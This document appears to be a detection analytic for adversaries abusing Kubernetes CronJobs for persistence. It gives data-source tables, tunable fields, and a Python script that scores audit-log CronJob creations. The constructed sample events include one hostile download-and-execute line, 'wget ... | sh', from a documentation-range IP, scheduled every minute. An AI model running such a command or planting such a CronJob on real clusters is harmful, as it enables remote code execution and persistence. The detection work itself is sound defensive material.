Detects abuse of container orchestration platforms (e.g., Kubernetes) in which an adversary creates a CronJob so that the scheduler repeatedly launches Jobs, and the pods that run them, across the cluster, giving persistent or recurring execution of malicious code.
| Data Component | Name | Channel |
|---|---|---|
| Scheduled Job Creation (DC0001) | kubernetes:apiserver | verb=create, resource=cronjobs, group=batch |
| Container Creation (DC0072) | kubernetes:events | container start/stop activity via Docker, containerd, or CRI-O |
| Network Traffic Content (DC0085) | container:proxy | outbound/inbound network activity from spawned pods |

| Field | Description |
|---|---|
| NamespaceScope | Kubernetes namespace the job is deployed to—scoping this to known trusted namespaces may reduce noise. |
| ImageRepository | The container image registry or repository the job pulls from—can be filtered by trusted registries. |
| ScheduleWindow | Cron expression or macro governing how often the CronJob fires (e.g., ‘@hourly’)—very frequent schedules (every minute) or runs outside the expected maintenance window may be suspicious. |
| ExecutionCommand | The command or entrypoint executed by the Job's containers (`command`/`args` in the pod template)—unexpected shells, interpreters, or download-and-execute one-liners may warrant inspection. |
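As an added example (not part of the original page or the ATT&CK project), the following Python applies the apiserver channel above to JSON-lines Kubernetes audit records and scores each CronJob creation against the four tunable fields. It assumes the audit policy records `batch/cronjobs` at `RequestResponse` level, so that `requestObject` carries the CronJob spec; the allowlists, registry name, usernames and sample events are constructed for the example.

```python
"""Added example: CronJob-creation detection over Kubernetes audit-log lines.

Assumes audit level RequestResponse for batch/cronjobs (requestObject present).
Allowlists and sample events below are made up for illustration.
"""
import json
import posixpath

# Tunable allowlists (assumed values; adjust per cluster).
TRUSTED_NAMESPACES = {"kube-system", "monitoring"}
TRUSTED_REGISTRIES = ("registry.internal.example/",)
INTERPRETERS = {"sh", "bash", "dash", "ash", "python", "python3", "perl", "ruby"}


def is_cronjob_create(event):
    """Apiserver channel match: verb=create, resource=cronjobs, group=batch.

    Only the ResponseComplete stage is kept so each request counts once
    (the RequestReceived stage repeats the same requestObject).
    """
    ref = event.get("objectRef", {})
    return (event.get("verb") == "create"
            and ref.get("resource") == "cronjobs"
            and ref.get("apiGroup") == "batch"
            and event.get("stage") == "ResponseComplete")


def extract_fields(event):
    """Pull the tunable fields out of the CronJob spec in requestObject."""
    spec = event.get("requestObject", {}).get("spec", {})
    pod = (spec.get("jobTemplate", {}).get("spec", {})
               .get("template", {}).get("spec", {}))
    containers = pod.get("containers", []) + pod.get("initContainers", [])
    return {
        "namespace": event.get("objectRef", {}).get("namespace"),
        "user": event.get("user", {}).get("username"),
        "schedule": spec.get("schedule"),
        "images": [c.get("image", "") for c in containers],
        "commands": [(c.get("command") or []) + (c.get("args") or []) for c in containers],
        "status": event.get("responseStatus", {}).get("code"),
    }


def is_high_frequency(schedule):
    """True when the minute field fires every 5 minutes or more often."""
    if not schedule or schedule.startswith("@"):
        return False  # macros such as @hourly fire at most once per hour
    minute = schedule.split()[0]
    if minute == "*":
        return True
    if minute.startswith("*/") and minute[2:].isdigit():
        return int(minute[2:]) <= 5
    return False


def assess(fields):
    """Return the reasons a CronJob creation deserves a look (empty = benign)."""
    reasons = []
    if fields["namespace"] not in TRUSTED_NAMESPACES:
        reasons.append("namespace %s not in trusted set" % fields["namespace"])
    for image in fields["images"]:
        if not image.startswith(TRUSTED_REGISTRIES):
            reasons.append("image %s from untrusted registry" % image)
    if is_high_frequency(fields["schedule"]):
        reasons.append("high-frequency schedule %r" % fields["schedule"])
    for argv in fields["commands"]:
        if argv and posixpath.basename(argv[0]) in INTERPRETERS:
            reasons.append("interpreter entrypoint: %s" % " ".join(argv))
    return reasons


def detect(lines):
    """Run the rule over JSON-lines audit records and return the findings."""
    findings = []
    for line in lines:
        event = json.loads(line)
        if not is_cronjob_create(event):
            continue
        fields = extract_fields(event)
        reasons = assess(fields)
        if reasons:
            findings.append({"user": fields["user"], "namespace": fields["namespace"],
                             "status": fields["status"], "reasons": reasons})
    return findings


def _cronjob_event(stage, namespace, user, schedule, image, command, code=201):
    """Build one constructed audit record in the shape kube-apiserver emits."""
    event = {
        "kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": stage,
        "verb": "create", "user": {"username": user},
        "objectRef": {"resource": "cronjobs", "apiGroup": "batch", "namespace": namespace},
        "requestObject": {"spec": {"schedule": schedule, "jobTemplate": {"spec": {
            "template": {"spec": {"containers": [
                {"name": "c", "image": image, "command": command}]}}}}}},
    }
    if stage == "ResponseComplete":
        event["responseStatus"] = {"code": code}
    return json.dumps(event)


# Constructed sample log lines: one expected backup job, one abusive job
# (seen at both audit stages), and an unrelated request.
ABUSIVE_CMD = ["/bin/sh", "-c", "wget -qO- http://203.0.113.5/x.sh | sh"]
SAMPLE_LINES = [
    _cronjob_event("ResponseComplete", "kube-system",
                   "system:serviceaccount:kube-system:backup-operator",
                   "0 2 * * *", "registry.internal.example/backup:1.4", ["/usr/bin/backup"]),
    _cronjob_event("RequestReceived", "default", "system:serviceaccount:default:default",
                   "* * * * *", "docker.io/library/alpine:3.19", ABUSIVE_CMD),
    _cronjob_event("ResponseComplete", "default", "system:serviceaccount:default:default",
                   "* * * * *", "docker.io/library/alpine:3.19", ABUSIVE_CMD),
    json.dumps({"stage": "ResponseComplete", "verb": "get",
                "objectRef": {"resource": "pods", "apiGroup": ""}}),
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_LINES):
        print(json.dumps(finding, indent=2))
```

Two practical checks before relying on this rule: confirm the audit policy actually logs `batch/cronjobs` at `RequestResponse` level (at `Metadata` level `requestObject` is absent, so image, schedule and command can never be evaluated and only the namespace test fires), and keep `responseStatus.code` in the finding so that denied attempts (403) can be triaged separately from CronJobs that were actually admitted (201).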